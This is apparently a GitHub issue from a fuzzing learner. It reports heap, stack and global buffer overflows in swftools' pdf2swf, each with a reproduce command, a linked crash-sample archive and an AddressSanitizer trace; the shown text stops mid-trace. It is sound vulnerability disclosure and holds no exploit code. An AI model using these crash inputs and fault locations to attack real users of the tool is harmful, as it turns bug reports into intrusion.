Hi, I currently learn to use fuzz tech to detect bugs and I found something in this repo. in order to reproduce the crash info, please attach ASAN when you compile this repo. ## heap buffer overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id3_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034354/id3_heap_buffer_overflow.zip) ### crash info ``` ==71111==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100004fce8 at pc 0x00000063ce64 bp 0x7ffdb8f7dab0 sp 0x7ffdb8f7daa8 READ of size 1 at 0x62100004fce8 thread T0 #0 0x63ce63 in DCTStream::readHuffSym(DCTHuffTable*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2825:14 #1 0x638c4a in DCTStream::readDataUnit(DCTHuffTable*, DCTHuffTable*, int*, int*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2345:17 #2 0x634338 in DCTStream::readMCURow() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2129:9 #3 0x632e98 in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2040:12 #4 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #5 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #6 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #7 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #8 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #9 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #10 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #11 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #12 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #13 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #14 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #15 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #16 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #17 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #18 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #19 0x7f645bf2ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #20 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) Address 0x62100004fce8 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2825:14 in DCTStream::readHuffSym(DCTHuffTable*) Shadow bytes around the buggy address: 0x0c4280001f40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001f80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c4280001f90: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa 0x0c4280001fa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c4280001fe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==71111==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id175_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034355/id175_heap_buffer_overflow.zip) ### crash info ``` ==50683==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x608000000280 at pc 0x000000751637 bp 0x7ffe2a4712c0 sp 0x7ffe2a4712b8 READ of size 8 at 0x608000000280 thread T0 #0 0x751636 in GfxICCBasedColorSpace::getDefaultColor(GfxColor*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:923:9 #1 0x6f5e8e in Gfx::opSetFillColorSpace(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:1163:17 #2 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #3 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #4 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #5 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #6 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #7 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #8 0x5fcfff in pdf_open(_gfxsource*, char const*) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:542:14 #9 0x500300 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:738:26 #10 0x7f363dd8ac86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x608000000280 is located 0 bytes to the right of 96-byte region [0x608000000220,0x608000000280) allocated by thread T0 here: #0 0x4f8d28 in operator new(unsigned long) /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x7497ce in GfxICCBasedColorSpace::parse(Array*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:890:8 #2 0x745a62 in GfxColorSpace::parse(Object*, StreamColorSpaceMode) /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:134:12 #3 0x6f5da4 in Gfx::opSetFillColorSpace(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc #4 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/GfxState.cc:923:9 in GfxICCBasedColorSpace::getDefaultColor(GfxColor*) Shadow bytes around the buggy address: 0x0c107fff8000: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 02 fa 0x0c107fff8010: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8020: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c107fff8030: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c107fff8040: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c107fff8050:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c107fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==50683==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id293_heap_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034357/id293_heap_buffer_overflow.zip) ### crash info ``` ==60167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000003080 at pc 0x00000092ceba bp 0x7ffe40762c20 sp 0x7ffe40762c18 WRITE of size 8 at 0x604000003080 thread T0 #0 0x92ceb9 in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:212:24 #1 0x92e224 in gfxpoly_from_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:226:5 #2 0x90989c in polyops_stroke /home/bupt/Desktop/swftools/lib/devices/polyops.c:229:23 #3 0x7c1563 in VectorGraphicOutputDev::strokeGfxline(GfxState*, _gfxline*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:612:9 #4 0x7cd69e in VectorGraphicOutputDev::stroke(GfxState*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1487:5 #5 0x6eeffa in Gfx::opStroke(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:1415:12 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #13 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #14 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #15 0x7f15d7322c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x604000003080 is located 0 bytes to the right of 48-byte region [0x604000003050,0x604000003080) allocated by thread T0 here: #0 0x4b3160 in malloc /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x92c94f in draw_stroke /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:192:26 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/gfxpoly/stroke.c:212:24 in draw_stroke Shadow bytes around the buggy address: 0x0c087fff85c0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff85d0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fd 0x0c087fff85e0: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 0x0c087fff85f0: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00 0x0c087fff8600: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00 =>0x0c087fff8610:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==60167==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id305_heap-buffer-overflow.zip](https://github.com/matthiaskramm/swftools/files/9034800/id305_heap-buffer-overflow.zip) ### crash info ``` ==8869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000035ae8 at pc 0x00000062399c bp 0x7ffdb53cd5e0 sp 0x7ffdb53cd5d8 WRITE of size 8 at 0x621000035ae8 thread T0 #0 0x62399b in DCTStream::reset() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:1994:15 #1 0x60dc99 in ImageStream::reset() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:337:8 #2 0x7c82aa in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1183:11 #3 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #4 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #5 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #6 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #7 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #8 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #9 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #10 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #11 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #12 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #13 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #14 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #15 0x7f2c3ecc8c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #16 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) 0x621000035ae8 is located 0 bytes to the right of 4584-byte region [0x621000034900,0x621000035ae8) allocated by thread T0 here: #0 0x4f8d28 in operator new(unsigned long) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_new_delete.cpp:99 #1 0x60ccb7 in Stream::makeFilter(char*, Stream*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:239:11 #2 0x60b856 in Stream::addFilters(Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:112:11 #3 0x65fa23 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:203:14 #4 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #5 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #6 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:1994:15 in DCTStream::reset() Shadow bytes around the buggy address: 0x0c427fffeb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fffeb40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fffeb50: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa 0x0c427fffeb60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeb70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeb80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeb90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fffeba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==8869==ABORTING ``` -------------------------------------- ## stack_buffer_overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id100_stack_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034360/id100_stack_buffer_overflow.zip) ### crash info ``` ==43189==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe33ffbdc4 at pc 0x00000060df33 bp 0x7ffe33ffbc50 sp 0x7ffe33ffbc48 WRITE of size 1 at 0x7ffe33ffbdc4 thread T0 #0 0x60df32 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:348:12 #1 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #2 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #3 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #4 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #5 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #6 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #7 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #8 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #9 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #10 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #11 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #12 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #13 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #14 0x7f6be3d6fc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #15 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) Address 0x7ffe33ffbdc4 is located in stack of thread T0 at offset 292 in frame #0 0x7c774f in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1127 This frame has 19 object(s): [32, 40) 'x1' (line 1130) [64, 72) 'y1' (line 1130) [96, 104) 'x2' (line 1130) [128, 136) 'y2' (line 1130) [160, 168) 'x3' (line 1130) [192, 200) 'y3' (line 1130) [224, 232) 'x4' (line 1130) [256, 264) 'y4' (line 1130) [288, 292) 'pixBuf' (line 1132) <== Memory access at offset 292 overflows this variable [304, 316) 'rgb' (line 1133) [336, 416) 'color_transform' (line 1137) [448, 456) 'buf' (line 1146) [480, 736) 'pal' (line 1151) [800, 804) 'gray' (line 1155) [816, 824) 'buf94' (line 1188) [848, 856) 'buf173' (line 1228) [880, 1904) 'pal179' (line 1231) [2032, 2044) 'rgb180' (line 1232) [2064, 3088) 'pal486' (line 1340) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:348:12 in ImageStream::getPixel(unsigned char*) Shadow bytes around the buggy address: 0x1000467f7760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000467f7770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000467f7780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000467f7790: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 0x1000467f77a0: 00 f2 f2 f2 00 f2 f2 f2 00 f2 f2 f2 00 f2 f2 f2 =>0x1000467f77b0: 00 f2 f2 f2 00 f2 f2 f2[04]f2 00 04 f2 f2 00 00 0x1000467f77c0: 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f8 f2 f2 f2 0x1000467f77d0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x1000467f77e0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x1000467f77f0: f2 f2 f2 f2 f2 f2 f2 f2 f8 f2 f8 f2 f2 f2 f8 f2 0x1000467f7800: f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==43189==ABORTING ``` -------------------------------------- ## global-buffer-overflow ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id7_global_buffer_overflow.zip](https://github.com/matthiaskramm/swftools/files/9034361/id7_global_buffer_overflow.zip) ### crash info ``` ==71185==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000001818502 at pc 0x00000063a7bf bp 0x7ffe36636f40 sp 0x7ffe36636f38 READ of size 1 at 0x000001818502 thread T0 #0 0x63a7be in DCTStream::transformDataUnit(unsigned short*, int*, unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2804:18 #1 0x634382 in DCTStream::readMCURow() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2135:4 #2 0x632e98 in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2040:12 #3 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #4 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #5 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #6 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #7 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #8 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #9 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #10 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #11 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #12 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #13 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #14 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #15 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #16 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #17 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #18 0x7f2cb74a3c86 in __libc_start_main 